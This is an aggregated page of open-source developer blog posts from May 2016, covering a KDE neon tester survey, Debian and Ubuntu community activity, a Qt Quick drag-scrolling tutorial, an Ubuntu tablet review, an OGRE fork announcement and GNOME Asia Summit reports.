May 03, 2016

Ubuntu developers

Svetlana Belkin: Ubuntu Membership Board Meet and Greet @ UOS

Sorry for the short notice, but I’m happy to announce that the Ubuntu Membership Board will be hosting a “meet and greet” session at the UOS this week.  We encourage those seeking membership to come with questions and drafts of their Ubuntu Wiki pages.  At least two of the board members will be there and ready to help.  The session is on Thursday at 16:00 – 16:55 UTC.

See you there!

EDIT TO ADD:  It’s a text-based session only.

03 May, 2016 01:51PM

Jonathan Riddell: KDE neon User Edition Testing Survey Results

We made a tech preview release of KDE neon User Edition 10 days ago and I put together a survey to gather feedback on people’s experiences.  We got 59 responses; here’s a summary:

Location?

Most respondents were from Europe, a number from the US, and the rest spread around the usual parts of the world.

How did you make the installable drive/disk?

First place goes to people who used a virtual machine, sensible enough for a testing release.

Next is ROSA, which I discovered recently and which seems to work on most OSes.  Then come people who use dd and risk wiping out their hard disk with a one-letter typo.  Surprisingly there are still people who write to a DVD to install; I’ve no idea why.

In the other category are:
  • rufus (Windows only)
  • usb-image-creator (Ubuntu only)
  • suse imagewriter (unmaintained)
  • gnome multiwriter (Linux only, and why would you want to write multiple drives at once?)
  • sudo cp neon-useredition-20160426-1028-amd64.iso /dev/sdb followed by sync (err, does this even work?)

Problems which occurred during booting of the live system

no problems for most

Several people reported the black bar in the isolinux/syslinux theme.  These themes are spooky voodoo.

People commented on UEFI not being supported; UEFI is even more spooky voodoo and Secure Boot is evil voodoo.

“The GRUB splash is practically blank. Pressing the arrow keys opened a dropdown list for language selection. Then I pressed the Esc key to get to the GRUB splash. The “Install” option isn’t any different from the “Try without installing” option.”

“Select the language Spanish, and half the options were translated.”

Problems which occurred running the live system

Lots of “none” here too.  Most comments queried the lack of applications; that’s a feature for now, we’ll add apps soon.

“klipper in menu? Im-config in menu? Panel icons wrong size/blurry”

“Upon mouse click in kicker panel consistently resulted in black screen with no recovery. Possible issue with Plasma 6 and AMD GPUs.”

“Baloo crashed immediately (notification in system tray), but did not seem to affect system function.”

Problems which occurred running the installer

‘The “Continue” button is available even after all the steps.’

“You do not ship with open-vm-tools-desktop, so my virtual desktop was smaller than the Ubiquity window”

“the installer was unable to install some packages: (although the provided list was blank), so i couldn’t install the system”

“Does not recognize UEFI partitions/System. Only legacy boot possible.”

“1. On the second page of the installer is a non replaced variable: “$(RELEASE)” 2. While installing there is no teaser how awesome kde is :-), just a blank page.”

‘Text “$(RELASE)” is displayed in german version of “Download updates while installing neon” * Checkbox “Download updates while installing neon” cannot be checked’

“Can’t continue installation in second step (prepare) due continue button is non-functional. Improvement: Install-Program should be in favorites”

There are bugs in here that come from Ubuntu and bugs that come from not having various bits installed.  I don’t think there’s much point spending much time on these as I expect to switch to Calamares soon.

Problems which occurred on the installed system:

Quite a few without problems

Lots of complaints about missing icons; this is a cache issue (“On the kicker menu, there were no icons, but they appeared after a re-boot.”) which we’ve fixed, I hope.

“Can not start system, just weird colors after install. ”

“After install of guest additions on VirtualBox desktop panel would load but then disappear.”

“Wanted to install it on dualboot with win 10. Grub does not appear so I cannot boot kde neon which I prefere as primary OS.”

“got a grub shell after install”

“Text garbage on the light blue loading screen after the GRUB menu.”

“if a display goes to sleep plasma partly crashes (same happens on kubuntu) it’s a qt problem as far as i know”

“Illegible characters till NVIDIA driver loaded ”

“Unable to use software-properties-kde : Error: could not find a distribution template for neon/xenial” (known bug this one)

“System boots to console login prompt. X can be started after login. ”

Problems which occurred when installing new software

“Plasma Discover crashed” – I have this too and it’s a priority to look into.

“There was a problem installing kde-l10n because of conflict with plasma-desktop-data”

Problems which occurred when updating the system to latest packages:

No problems for most people but some issues:

  • The updater applet didn’t seem to work for some reason. Had to use Discover.
  • First boot after “apt-get update” and “upgrade”: the system boots to the graphical login screen, but after login only the “x” pointer is visible. –> Hard reset
  • After reboot only the console login is visible, X does not start (“Timeout locking .Xauthority”)
  • Could not find repos
  • Another – using Discover, added Gwenview – it installed but closed Discover on completion?

Thanks a lot to everyone who tested and gave feedback.  That gives me a good idea of the priority areas to work on.  Keep on testing and reporting bugs, and of course any help is welcome :)

 


03 May, 2016 11:27AM

Raphaël Hertzog: My Free Software Activities in April 2016

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Debian LTS

I handled a new LTS sponsor that wanted to see wheezy keep supporting armel and armhf. This was not part of our initial plans (set during the last DebConf) and I thus mailed all the teams that would be impacted, asking whether we could collectively decide that it was OK to support those architectures. While I was hoping to get a clear answer rather quickly, it turns out that we never managed to get an answer to the question from all parties. Instead the discussion drifted onto the more general topic of how we handle sponsorship/funding in the LTS project.

Fortunately, the buildd maintainers said they were OK with this and the ftpmasters had no objections, and they both implicitly enacted the decision: Ansgar Burchardt kept the armel/armhf architectures in the wheezy/updates suite when he handled the switch to the LTS team, and Aurélien Jarno also configured wanna-build to keep building armel/armhf for the suite. The DSA team did not confirm that this change was not interfering with one of their plans to decommission some hardware. Build daemons are a shared resource anyway and a single server is likely to handle builds for multiple releases.

DebConf 16

This month I registered for DebConf 16 and submitted multiple talk/BoF proposals:

  • Kali Linux’s Experience of a Debian Derivative Based on Testing (Talk)
  • 2 Years of Work of Paid Contributors in the Debian LTS Project (Talk)
  • Using Debian Money to Fund Debian Projects (BoF)

I want to share the setup we use in Kali as it can be useful for other derivatives and also for Debian itself to help smooth the relationship with derivatives.

I also want to open again the debate on the usage of money within Debian. It’s a hard topic but we should really strive to take some official position on what’s possible and what’s not possible. With Debian LTS and its sponsorship we have seen that we can use money to some extent without hurting the Debian project as a whole. Can this be transposed to other teams or projects? What are the limits? Can we define a framework and clear rules? I expect the discussion to be very interesting in the BoF. Mehdi Dogguy has agreed to handle this BoF with me.

Packaging

Django. I uploaded 1.8.12 to jessie-backports and 1.9.5 to unstable. I filed two upstream bugs (26473 and 26474) for two problems spotted by lintian.

Unfortunately, when I wanted to upload it to unstable, the test suite did not run. I pinned this down to an SQLite regression. Chris Lamb filed #820225 and I contacted the SQLite and Django upstream developers by email to point them to this issue. I helped the SQLite upstream author (Richard Hipp) to reproduce the issue and he was quick to provide a patch which landed in 3.12.1.

Later in the month I made another upload to fix an upgrade bug (#821789).

GNOME 3.20. As for each new version, I updated gnome-shell-timer to ensure it works with the new GNOME. This time I spent a bit more time fixing a regression (805347) that dates back a while and that would never have been fixed otherwise, since the upstream author orphaned this extension (as he no longer uses GNOME).

I have also been bitten by display problems where accented characters would be displayed below the character that follows. With the help of members of the GNOME team, we found out that this was a problem specific to the cantarell font and was only triggered with Harfbuzz 1.2. This is tracked in Debian with #822682 on harfbuzz and #822762 on fonts-cantarell. There’s a new upstream release (with the fix) ready to be packaged but unfortunately it is blocked by the lack of a recent fontforge in Debian. I thus mailed debian-mentors in the hope of finding volunteers to help the pkg-fonts team package a newer version…

Misc Debian/Kali work

Distro Tracker. I started to mentor Vladimir Likic, who contacted me because he wants to contribute to Distro Tracker. I helped him set up his development environment and we fixed a few issues in the process.

Bug reports. I filed many bug reports, most of them due to my work on Kali:

  • #820288: a request to keep the wordpress package installable in older releases (due to renaming of many php packages)
  • #820660: request support of by-hash indices in reprepro
  • #820867: possibility to apply overrides on already installed packages in reprepro
  • #821070: jessie to stretch upgrade problem with samba-vfs-modules
  • #822157: python-future hides and breaks python-configparser
  • #822669: dh_installinit inserts useless autoscript for System V init script when package doesn’t contain any
  • #822670: dh-systemd should be merged into debhelper, we have systemd by default and debhelper should have proper support for it by default

I also investigated #819958 that was affecting testing since it has been reported to Kali as well. And I made an NMU of dh-make-golang to fix #819472 that I reported earlier.

Thanks

See you next month for a new summary of my activities.


03 May, 2016 07:13AM

The Fridge: Ubuntu Weekly Newsletter Issue 464

Welcome to the Ubuntu Weekly Newsletter. This is issue #464 for the week April 25 – May 1, 2016, and the full version is available here.

In this issue we cover:

This issue of the Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Simon Quigley
  • Chris Guiver
  • Chris Sirrs
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

03 May, 2016 01:39AM

May 02, 2016

Maemo developers

Visitor for Klartext

Felt good about explaining my work last time. For no reason. I guess I’m happy, or I no longer feel PGO’s pressure or something. Having to be politically correct all the time sucks. Making technically and architecturally good solutions is what drives me.

Today I explained the visitor pattern. We want to parse Klartext in such a way that we can present its structure in an editing component. It’s the same component for which I utilized an LRU last week. We want to visualize significant lines like tool changes, but also make cycles foldable like SciTE does with source code, and a whole lot of other stuff that I can’t tell you because of teh secretz. Meanwhile these files are, especially when generated using CAD-CAM software, amazingly huge.

Today I had some success explaining visitor using the Louvre as the thing that is “visitable” (the AST) and a Japanese guy who wants to collect state (photos) as a visitor of fine arts. Hoping my good-taste solutions (not my words, it’s how Matthias Hasselmann describes my work at Nokia) will once again yield a certain amount of success.

ps. I made sure that all the politically correcting categories are added to this post. So if you’d filtered away the condescending and controversial posts from my blog, you could have protected yourself from being in total shock now (because I used the sexually tinted word “sucks” earlier). Guess you didn’t. Those categories have been in place on my blog’s infrastructure for many years. They are like the Körperwelten (Body Worlds) exhibitions; you don’t have to visit them.


02 May, 2016 08:06PM by Philip Van Hoof (pvanhoof@gnome.org)

Ubuntu developers

Aurélien Gâteau: Reordering a Qt Quick ListView via drag'n'drop - part 2

Welcome to this second article in the "Reordering a Qt Quick ListView via drag'n'drop" series. If you haven't read it already, I suggest you start with the first article.

In this article we are going to add a handy feature to our ListView: the ability to automatically scroll the ListView when dragging an item to its top or bottom edge. This is nice when you want to drag an item to a place which is not currently visible.

Here is this new behavior in action:

Drag scrolling

We are going to implement this by using the MouseArea of the DraggableItem introduced in the first article. When the mouse cursor in this MouseArea is close enough to the borders of the ListView we will trigger scrolling animations. This is a bit less elegant than adding MouseAreas at the top and bottom of the ListView, but has the nice advantage of not requiring any change in the ListView.

The first thing we are going to do is add a few properties to our component:

// Size of the area at the top and bottom of the list where drag-scrolling happens
property int scrollEdgeSize: 6

// Internal: set to -1 when drag-scrolling up and 1 when drag-scrolling down
property int _scrollingDirection: 0

// Internal: shortcut to access the attached ListView from everywhere.
// Shorter than root.ListView.view
property ListView _listView: ListView.view

Now we can declare two animations to scroll the list:

SmoothedAnimation {
    id: upAnimation
    target: _listView
    property: "contentY"
    to: 0
    running: _scrollingDirection == -1
}

SmoothedAnimation {
    id: downAnimation
    target: _listView
    property: "contentY"
    to: _listView.contentHeight - _listView.height
    running: _scrollingDirection == 1
}

These two animations operate on the ListView and will make it scroll by animating its contentY property, depending on the value of _scrollingDirection. All that remains is to update _scrollingDirection when dragging to the top or bottom edge of the ListView. We do this by changing the binding of _scrollingDirection when we enter the "dragging" state:

_scrollingDirection: {
    var yCoord = _listView.mapFromItem(dragArea, 0, dragArea.mouseY).y;
    if (yCoord < scrollEdgeSize) {
        -1;
    } else if (yCoord > _listView.height - scrollEdgeSize) {
        1;
    } else {
        0;
    }
}

Here we define a complex expression for _scrollingDirection: first we compute the y coordinate relative to the ListView. Then we check its value to see if we are on either the top or bottom edge, and update the value accordingly.
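
For context, here is one way this binding can be scoped to the "dragging" state so that it is only active while a drag is in progress. This is a sketch rather than the article's exact code: the draggableRoot id is an assumed name for the DraggableItem's root item, and the "dragging" state is the one introduced in the first article.

// Sketch only: "draggableRoot" is an assumed id for the DraggableItem root.
// The binding is the same expression as above, now owned by the state.
states: State {
    name: "dragging"
    PropertyChanges {
        target: draggableRoot
        _scrollingDirection: {
            var yCoord = _listView.mapFromItem(dragArea, 0, dragArea.mouseY).y;
            if (yCoord < scrollEdgeSize) {
                -1;
            } else if (yCoord > _listView.height - scrollEdgeSize) {
                1;
            } else {
                0;
            }
        }
    }
}

Outside the "dragging" state the property simply falls back to its default value of 0, so neither animation runs.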

We can now scroll the ListView by dragging items to its top or bottom edge. You might notice an annoying bug though: when you drop an item below the last item, the dropped item does not become visible. To work around this, we need a little hack: once the ListView has moved the dropped item to its final position, we can call the ListView.positionViewAtIndex() method to ensure our item is visible. The trick is, even if the code connected to moveItemRequested moves the item synchronously, we cannot call positionViewAtIndex right after the signal has been emitted: we need to wait until the ListView has actually adjusted itself after the move. To do so, we can use a Timer object to delay the call to positionViewAtIndex. This is what emitMoveItemRequested now looks like:

function emitMoveItemRequested() {
    var dropArea = contentItemWrapper.Drag.target;
    if (!dropArea) {
        return;
    }
    var dropIndex = dropArea.dropIndex;
    if (model.index < dropIndex) {
        dropIndex--;
    }
    if (model.index === dropIndex) {
        return;
    }
    root.moveItemRequested(model.index, dropIndex);
    makeDroppedItemVisibleTimer.start();
}

And this is our Timer:

Timer {
    id: makeDroppedItemVisibleTimer
    interval: 0
    onTriggered: {
        _listView.positionViewAtIndex(model.index, ListView.Contain);
    }
}

An interval of 0 means the timer will be triggered as soon as we are back to the event loop. Note that this only works because in our example the code connected to the DraggableItem.moveItemRequested signal is synchronous: it does not delay the move of the dropped item. If the code were asynchronous, you would have to find a way to call ListView.positionViewAtIndex after the move is done, which most likely would require calling it outside of DraggableItem.
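
If you do end up in that asynchronous situation, one possible shape for it is to react to a completion notification from the model, next to the ListView itself. This is purely illustrative and not part of the article's code: the myModel id and its moveFinished(int newIndex) signal are assumptions.

// Illustrative only: assumes the model emits moveFinished(int newIndex)
// once the asynchronous move has actually been applied.
Connections {
    target: myModel
    onMoveFinished: listView.positionViewAtIndex(newIndex, ListView.Contain)
}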

We are done with drag-scrolling: the user can now scroll long lists to find the place to drop the dragged item. The source code for this article is available in the associated GitHub repository, under the "2-drag-scroll" tag.

02 May, 2016 05:52PM

Costales: Review of the bq M10 Ubuntu Edition tablet

My first post from a tablet running Ubuntu, the bq M10.

M10
I could talk about its hardware or its specifications, I could quote its price, count how many versions of the tablet exist, list the version of every application, or explain what convergence is...
But all of that information has been available on the Internet since it hit the market. So instead I’ll tell you about the experience of using a tablet with Ubuntu for a couple of weeks ;)

My desktop? No ;)
First point I want to make clear: I don’t like tablets. I prefer the precision of a keyboard and mouse a thousand times over.

Second point: I adore Ubuntu Phone. When I’m AFK I still have a genuine Ubuntu in my pocket.

Third point: I don’t have any monitors with HDMI input, so the only convergence I can hope for is the one based on the upcoming Miracast support.

Let’s focus on the tablet on the market that comes closest to a real desktop OS.

The operating system is Ubuntu, but Ubuntu Touch with Unity 8, not the Unity 7 of the current desktop.

Legendary! :)
That said, the applications are the same as on the phone, but, surprise, quite a few come preinstalled, such as LibreOffice, GIMP, Gedit, Firefox, XChat...
The best part is that they are real applications that behave as such with a keyboard and mouse. The bad part is that it isn’t easy to install other desktop applications (the so-called legacy apps). I understand that this will become possible in the short term, and then the tablet will gain a lot of points.

In the meantime, I don’t use LibreOffice, I use GIMP only sporadically and Gedit never, so what I end up with is a 10" phone; that is, not very useful or productive for my daily work.

But what is bad for me is perfection for others. I know teachers and students for whom this tablet is perfect: at half a kilo it is very portable, their main task is using LibreOffice, and it lets them work with the same device at home and at school, and even project presentations. Without a doubt, for those needs only this tablet or a very expensive ultrabook would fit the bill.
The potential market niche is very large.

The tablet I’m testing is the FHD model; like the Ubuntu phones with high-resolution screens, it has a small, annoying lag.

Choosing app

The bq M10 handles exactly like a bq E4.5 Ubuntu Edition in every sense. If we connect a mouse via Bluetooth it switches to windowed mode, with Unity showing itself when we bring the mouse close. We can minimize, maximize, move and snap windows... it really looks like a desktop Ubuntu, and this is where Ubuntu Touch gains points.

keyboard + mouse = PC

Regarding convergence, as I mentioned, I don’t have HDMI monitors. If you do, you can work in several ways:

  • Touch, like any other tablet.
  • Add a keyboard and mouse and you have a small netbook.
  • Add a keyboard and mouse, connect it via HDMI to a monitor and you have a PC, with the tablet acting as the CPU.
Convergence :))

    The battery lasts about 8 hours of work.

    In windowed mode (with a mouse connected) all applications run at the same time, with real multitasking. In touch mode, only the one in the foreground is running.

    Netbook??

    It’s a joy to use with the keyboard: we can copy and paste (even between applications), switch applications with Alt+Tab, use Win+number to pick an application in Unity... etc.

    It has a file browser with the look of Nautilus.

    And splitting the screen to see two applications simultaneously in touch mode is very useful. To do that, drag any application with three fingers.





    You can buy this tablet here. Images CC.

    02 May, 2016 04:43PM by Marcos Costales (noreply@blogger.com)

    Daniel Holbach: Ubuntu Core at UOS 16.05

    Ubuntu 16.04 LTS is out of the door, we have already started work on the Yakkety Yak, and now it’s time for the Ubuntu Online Summit. It’s all happening 3-5 May, 14:00-20:00 UTC. This is where we discuss upcoming features, get feedback and demo all the good work which has happened recently.

    If you want to join the event, just head to the registration page and check out the UOS 16.05 schedule afterwards. You can star (☆) sessions and mark them as important to you and thus plan your attendance for the event.

    Now let’s take a look at the bits which are in one way or another related to Ubuntu Core at UOS:

    • Snappy Ubuntu 16 – what’s new
      16.04 has landed and with it came big changes in the world of snapd and friends. Some of them are still in the process of landing, so you’re in for more goodness coming down the pipe for Ubuntu 16.04 LTS.
    • The Snapcraft roadmap
      Publishing software through snaps is super easy and snapcraft is the tool to use for this. Let’s take a look at the roadmap together and see which exciting features are going to come up next.
    • Snappy interfaces
      Interfaces in Ubuntu Core allow snaps to communicate or share resources, so it’s important we figure out how interfaces work, which ones we’d like to implement next and which open questions there are.
    • Playpen – Snapping software together
      Some weeks ago the Community team set up a small branch in which we collaborated on snapping software. It was good fun, we worked on things together, learnt from each other and quickly worked out common issues. We’d like to extend the project and get more people involved. Let’s discuss the project and workflow together.
    • How to snap your software
      If you wanted to start snapping software (yours or somebody else’s) and wanted to see a presentation of snapcraft and a few demos, this is exactly the session you’ve been looking for.
    • Snappy docs – next steps
      Snappy and snapcraft docs are luckily being written by the developers as part of the development process, but we should take a look at the docs together again and see what we’re missing, no matter if it’s updates, more coherence, more examples or whatever else.
    • Demo: Snaps on the desktop
      Here’s the demo on how to get yourself set up as a user or developer of snaps on your regular Ubuntu desktop.

    I’m looking forward to seeing you in all these sessions!

    02 May, 2016 03:43PM

    Maemo developers

    Introducing the OGRE fork on GitHub

    In this post I want to introduce the OGRE fork on GitHub. The goal of the fork is to provide a stable and reliable OGRE 1.x series while at the same time modernizing parts under the hood.

    The idea behind this is that there are many existing 1.x codebases, actually a whole 1.x ecosystem, that can be modernized that way.
    The last release of the 1.x series was over 2 years ago, so using the current 1.10 branch already gives a lot of improvements.

    However the 1.10 branch contains some unnecessary changes that make it incompatible with the 1.9 release. These were reverted, so old code should compile again.

    Additionally there are modernizing changes compared with the upstream at Bitbucket, which are discussed in more detail below.

    Replace legacy renderers

    With 1.9 the only stable renderers were GL (2.0) and DX9, which by now are outdated and produce different results from the GLES2 renderer that is used for Web and Mobile, which makes porting applications harder.

    Therefore the goal is to get the GL3Plus renderer into a shape where it can act as a drop-in replacement for the old GL renderer and then drop the latter.

    You can see the current status here – while it says that only 41/86 tests pass, most of the failed tests actually differ in only 1 or 2 pixels, which is pretty good considering we are comparing fixed-function rendering vs. dynamically generated shaders (RTSS).

    But the fork does not stop here; the GL renderers now also share the context creation code. This allows using the GLES2 renderer on the desktop or creating a GL3+ context using EGL – which is a prerequisite for headless rendering and for running on Wayland/MIR. Overall this makes your applications much more portable.

    Improved regression testing

    Changing the renderer requires being able to continuously monitor whether the rendering is still correct and to immediately detect regressions.

    For this the Testing and VisualTesting frameworks were fixed and now correctly run on Linux and OSX. They run on each pull request to catch errors before the code even touches master.

    Furthermore the tests can now be built without input handling (OIS) which hopefully will lead to wider adoption.

    The unit tests still use cppunit which is a pain to use when compared to gtest, but changing that would require a large rewrite.

    Batteries Included

    The build of the fork automatically handles the dependencies by downloading and building them as needed. On all platforms. So you do not have to care about mismatching compile settings any more.

    Furthermore the SampleBrowser can now be built without input handling, which eases quick testing. And in case you want input, SDL2 is now used instead of the esoteric and outdated OIS.

    Next, bringing your applications to the web is now easier; OGRE has been able to run in the browser for a long time already, but the process was only badly documented. The fork tracks the Emscripten sample code inside the repository and also has documentation on how to use it.

    I gave only a high level overview of the changes above. If you need more details, head over here.

    A word on OGRE 2.1

    You might wonder why one should care about the 1.x series and not go for 2.1 directly. The obvious reason is that you have an existing codebase, and OGRE 2.1 drastically changes the API and even the material file format.

    Then, while faster than 1.x, OGRE 2.x is still far from feature parity with 1.x – it still completely lacks Web and Mobile support.
    “Faster” also depends on your scene/material usage; for instance, if you only render a single object (a product showcase), 2.x will not offer you any advantages.

    Finally, the main functionality advance in 2.1, namely the new material system (HLMS) and with it physically based shading, has been backported to 1.x.

    Yet if you only care about desktop and want to render large immersive worlds (lots of nodes, lots of materials), 2.1 is the way to go.

     

     


    02 May, 2016 02:38PM by Pavel Rojtberg (pavel@rojtberg.net)

    Blankon developers

    Syai Mif: Journey to West (English version)

    My first trip to the west, and a second chance to be a speaker at the GNOME Asia Summit. Call for papers: before travelling to the west, or rather before getting the opportunity to attend an event of the GNOME Asia Summit’s calibre as a speaker, I first had to apply with my presentation when registering as a speaker. I filled in the whole form and after … Continue reading Journey to West (English version)

    02 May, 2016 03:09AM

    Syai Mif: Journey to West (Indonesia version)

    My first trip to the west and my second chance as a speaker at the GNOME Asia Summit. Call for papers: before making the trip to the west, or rather before getting the opportunity to attend an event of the GNOME Asia Summit’s calibre as a speaker, I first applied with my presentation when registering as a speaker. I filled in the form completely and after I applied I received a confirmation … Continue reading Journey to West (Indonesia version)

    02 May, 2016 02:11AM

    May 01, 2016

    Ubuntu developers

    Svetlana Belkin: Goals for Y Cycle

    It’s that time again when I write up goals for the next Ubuntu release cycle!  But as a side thought, I noticed that I started to think in Ubuntu release cycles when planning my goals for the next six months.  I guess it’s my new measure of time since I’m out of school…  Anyhow, these are my goals for the Y (16.10) cycle:

    • See the Tweets below:

    I don’t know yet if I will remix Red Notebook because, at the moment, it’s the closest thing that I have seen to an electronic lab notebook. I will have a post when I start this project (week of May 1st to week of May 8th).

    EDIT TO ADD: I’m also thinking of writing one in Qt and calling it Qt ELN (Electronic Lab Notebook).

    • Hack around my favorite NetHack-style game, Dungeon Crawl Stone Soup! My main idea/hack is to add zealots of every god instead of just a select few.  But I may expand on that…  Again, I will have a post when I start this project.
    • Do more with Linux Padawan’s community.  I don’t know what yet though…

    Hopefully, I can complete these projects or at least learn from working on them.  I will work on updating you all at least once a month.

    Wish me luck!

    01 May, 2016 05:01PM

    Full Circle Magazine

    Just a quick look at GIMP on the BQ Aquaris M10 Ubuntu Edition tablet.

    01 May, 2016 03:32PM

    Michael Terry: In-App Purchases Available in the Ubuntu Store

    I haven’t seen anyone else trumpeting this online. So I guess I will. 🙂

    Since Ubuntu Touch’s OTA 10 update, apps can offer in-app purchases! Yay!

    Besides allowing someone to write the next Candy Crush, this also means that app authors can stop providing separate “donation” versions of their app. Which means less busywork for authors, reviews are all on the same app, and less confusion for users.

    Documentation is available from the QtPurchasing module docs. And remember to update your app’s framework to 15.04.4 (OTA 10).

    If you want to see it in action, I’ve enabled a donation button in my “Lone Wolf” game app. No need to actually donate, it just might be interesting to see how it looks to the user (hit the “night mode” button in the upper right to see it — donating turns on the night mode feature).

    Speaking of which, if you actually do something based on a purchase (like enabling a feature), the QtPurchasing docs recommend saving purchase information in “persistent storage.” I’ve just stuffed a boolean in a Settings object. But that’s easy for a user to modify themselves on disk. I don’t care about donation fraud, but I’m curious how I should better protect against that, in case I do something more interesting with IAP.
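
    To make that concrete, here is a minimal sketch of the Settings-object approach described above. It is not the actual Lone Wolf code: the product identifier, the setting name and the ids are made up for illustration.

    import QtQuick 2.4
    import Qt.labs.settings 1.0
    import QtPurchasing 1.0

    Item {
        // Hypothetical persistent flag; Settings writes it to a plain config
        // file on disk, which is why a user could flip it by hand.
        Settings {
            id: appSettings
            property bool nightModeUnlocked: false
        }

        Store {
            Product {
                id: donation
                identifier: "example.donation.nightmode"  // made-up identifier
                type: Product.Unlockable
                onPurchaseSucceeded: {
                    appSettings.nightModeUnlocked = true;  // the "persistent storage"
                    transaction.finalize();
                }
            }
        }
    }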

    01 May, 2016 02:07PM

    Blankon developers

    Ahmad Haris: Journey to The West (GNOME Asia Summit 2016) – Delhi, India

    This is the third GNOME Asia Summit that I have attended. My contribution to this summit was as part of the Asia Committee. I helped with everything I could, such as:

    1. getting sponsors
    2. designing the website (Asep, Piko and Kukuh also helped with this)
    3. designing posters (Kukuh and Aris also helped with this)
    4. coordinating with the other Asia Committee members, the GNOME Board and the Local Committee
    5. hand-carrying FANS shoes (from a sponsor) from Jakarta to Delhi

    I was actually excited that this year’s summit happened in India, because Indonesia has a similar culture to India and it’s common for Indonesian people to watch Bollywood movies (my father still loves Bollywood movies; as for me, only Shakhrukh Khan and some others).

    Personally, I have also dreamed of visiting a few historical places. I had been to the Great Wall of China when I attended the GNOME Asia Summit in Beijing. And this year, we have the Taj Mahal.

    Submit Talk

    I submitted a talk about Contributing to GNOME in Indonesia and it was approved, but I withdrew it myself (because I’m one of the people who choose which topics are best for the conference). I would rather see locals talk than myself.

    Ticket and Visa

    I bought an AirAsia ticket (because it was cheaper than the others) for around 400 USD for Jakarta – New Delhi and New Delhi – Jakarta. I got a travel subsidy from GNOME (thanks, GNOME). For the visa, I used an e-Visa. It’s easy and fast, and it cost about 49 USD.

    Arrived at India

    I arrived in India at about 10 pm local time. It took nearly an hour to get through immigration. And magically, it was easy to get through customs (FYI, I brought 30 shoes and 21 t-shirts). I was with Moko and Syaimif at that time.

    We got a taxi and went straight to Manav Rachna University. The taxi driver was very friendly; he tried to speak with us even though his English was not very good. We arrived at the university at about 1 am and had some difficulties because the university security staff couldn’t speak English. Luckily, our taxi driver helped us, so we could get the room that the local committee provided and have a rest.

    Anyway, I will not talk about technical things here.

    Day 0

    I got to the venue late just because I didn’t know where the venue was. The university is huge, with lots of buildings and a wide area. They had already started the opening speech by that time. My first impression: I was happy because I met lots of friends.

    The good thing here is that people love to talk with foreigners, maybe because they mostly speak English in daily life. I enjoyed talking with everyone, because it makes my English better and better.

    I was amazed by the participants. Many of them love technical things. Especially during the GStreamer workshop, many people followed along. This did not happen in Indonesia last year.

    https://www.flickr.com/photos/kitty-kat/26296528570/in/pool-gnomeasia2016/

    Day 1

    I was a little bit shocked, actually, just because Bin Li and I had to give an opening speech together with locals such as some professors/deans. I had not prepared for that. But the opening was great; that was a new experience for me.

    DSC00643

    Day 1 was amazing because it felt like a reunion and I met new friends. For me, the highlight was that I could talk with another GNOME Board Director, Cosimo Cechi.

    At this summit we also had local food and local tea, very delicious. The food itself was great and not weird for me, which matters since I personally find it a little bit difficult to get food in another country.

    DSC00699

    The good news from Day 1: there were a lot of female participants. That’s good because IT summits mostly have fewer female participants. They were also very active.

    DSC00820

    Day 2

    The second day of the summit was also interesting; personally, I attended the Bugzilla class with Andre Klapper as the speaker. I had missed this class last year at GNOME Asia 2015.

    DSC00730

    I was also at Mr. Iwan’s class, talking about FOSS at Tata Logam Lestari.

    DSC00739

    But I missed Moko’s class. Day 2 kept me busy. Kat, Cosimo, Bin Li and I became famous here: we were invited to visit lots of university departments and had the honor of meeting the Director of Manav Rachna University. Kat, Cosimo and I were also on air at the radio station that belongs to Manav Rachna University and broadcasts in the Faridabad area. That was my first time on foreign radio. Hahaha.

    Last Day, One Tour Day

    The last day was a journey. I can’t explain it in text, but it was an amazing trip. I really enjoyed it since this was my first time in India. We went to Agra (the Taj Mahal).

    BIN_6248s

    IMG_20160424_162250

    You can see that all of us enjoyed this trip, even if I felt there were too many wefies. Hahaha.

    Extra Day

    My flight was on Monday night, so I still had a few hours to take a look around New Delhi. I went with Moko, Syaimif, Bin Li, Michael, Jonathan, Eric, Johan Chi and Raju, and also Amisha, but she left in the afternoon for family business.

    Our target was the Delhi Gate.

    DSC01037

    After all, we can contribute many things to GNOME. Just pick whichever one interests you.

    Note : you can see all group picture at https://www.flickr.com/groups/gnomeasia2016/pool/

    Sponsored by the GNOME Foundation

     

     

     


    01 May, 2016 04:25AM

    Ubuntu developers

    Ubuntu GNOME: Say hello to Yakkety Yak

    Hello world,

    Oh yes, here we are again with yet another new cycle and this time, it’s the “YY” cycle – Yakkety Yak – please see the official announcement.

    We would like to announce that testing of Ubuntu GNOME Yakkety Yak (16.10) is open, and we encourage those who would like to have some fun to start testing now. Even though we have just started and there is nothing new yet, you never know when you might find a new bug!

    Whether you are new to testing or not, here is your reference:

    https://wiki.ubuntu.com/UbuntuGNOME/Testing

    And as always, if you need any help or have any question, please contact us!

    Thank you 🙂

     

    01 May, 2016 01:39AM

    April 30, 2016

    Grml developers

    Frank Terbeck: Chez Scheme is now Open Source

    The Scheme implementation known as Chez Scheme, from Cadence Research Systems (which was acquired by Cisco in 2012), had been commercial for more than 30 years and has now been released as Open Source software under the Apache License 2.0.

    This is a pretty cool move by R. Kent Dybvig and Cisco, making this high-quality implementation available to the general public. Chez has, among other things, support for compiling Scheme sources to native machine code, something that my go-to Scheme, GNU Guile, doesn't feature (although there are long-term plans in that direction, as far as I know).

    In case you're interested:

    30 April, 2016 11:17PM

    Xanadu developers

    Firefox integrates GTK3 on Linux and improves the security of the JavaScript JIT compiler

    A few hours ago Mozilla released a new version of Firefox whose highlights include GTK3 integration on Linux, security improvements in the just-in-time (JIT) JS compiler, changes in WebRTC and new features for Android and … Continue reading

    30 April, 2016 07:16PM by sinfallas

    Xanadu

    Xanadu GNU/Linux on social networks

    A few days ago we published a list of links related to the development and documentation of Xanadu GNU/Linux, but since not everything is work, today we bring you a list of the social networks where our community has a presence. … Continue reading

    30 April, 2016 07:01PM by sinfallas

    April 29, 2016

    Maemo developers

    Putting an LRU in your code

    For the ones who didn’t find the LRU in Tracker’s code (and for the ones who were lazy).

    Let’s say we will have instances of something called a Statement. Each of those instances is relatively big, but we can recreate them relatively cheaply. We will have a huge number of them, but at any time we only need a handful of them.

    The ones that are most recently used are most likely to be needed again soon.

    First you make a structure that will hold some administration of the LRU:

